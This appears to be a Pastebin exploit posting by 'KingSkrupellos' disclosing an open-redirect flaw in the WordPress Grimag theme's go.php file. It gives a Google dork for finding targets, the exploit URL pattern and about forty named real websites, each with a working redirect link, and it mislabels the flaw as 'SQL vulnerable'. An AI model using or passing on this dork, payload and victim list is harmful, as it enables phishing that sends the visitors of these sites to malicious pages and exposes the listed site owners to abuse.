Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress Grimag Themes 1.2.5 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 24/03/2020
- # Vendor Homepage : strictthemes.com
- # Software Link : themesinfo.com/grimag-wordpress-news-theme-gif
- # Software Version : 1.0 - 1.0.6 - 1.0.7 - 1.2.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/wp-content/themes/Grimag/
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- WordPress Grimag Themes 1.2.5 accepts a user-controlled input that specifies
- a link to an external site, and uses that link in a Redirect. This simplifies phishing
- attacks. An http parameter may contain a URL value and could cause the web
- application to redirect the request to the specified URL. By modifying the URL
- value to a malicious site, an attacker may successfully launch a phishing scam and
- steal user credentials. Because the server name in the modified link is identical to the
- original site, phishing attempts have a more trustworthy appearance. Open redirect is a
- failure in that process that makes it possible for attackers to steer users to malicious
- websites. This vulnerability is used in phishing attacks to get users to visit malicious
- sites without realizing it. Web users often encounter redirection when they visit the
- Web site of a company whose name has been changed or which has been acquired by
- another company. Visiting unreal web page user's computer becomes affected
- by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # SQL Vulnerable File :
- ***********************
- /go.php
- # SQL Vulnerable Parameter :
- ****************************
- ?
- # Open Redirection Exploit :
- **************************
- /wp-content/themes/Grimag/go.php?[http://www.REDIRECTADDRESS.gov]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] oktotech.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] hikersblog.co.uk/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] oktostore.com/blog/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] quotes2love.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] theworldguru.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] nevernoob.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] velcrogloves.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] 64measuresmusic.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] evus.com/blog/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] 365nutri.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] blog.cgduck.pro/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] patextra.it/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] cuisart.fr/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] ipnews.be/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] bodybuildersreality.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] zeviiontechnology.com/blog1/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] oilworldcompanies.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] lucaglaser.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] roteirosliterarios.com.br/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] lovedatingdoc.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] evo-group.ro/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] doba.sk/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] mariaciavotta.it/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] busquenobairro.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] bettermebetterwe.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] mydad.gr/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] ima.pe/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] ba.unidadpopular.org.ar/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] metaconseil.com/blog/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] temple.my/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] ccir.it/ccir/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] desportomatosinhos.pt/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] soyprogramador.liz.mx/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] nguyenbatien.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] world-voyage.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] estamosalaire.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] auto.nieuwscompleet.nl/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] meusdesencontros.com.br/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] gestaopublica.blog.br/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- [+] blog.turbosfrance.com/wp-content/themes/Grimag/go.php?https://cxsecurity.com/
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
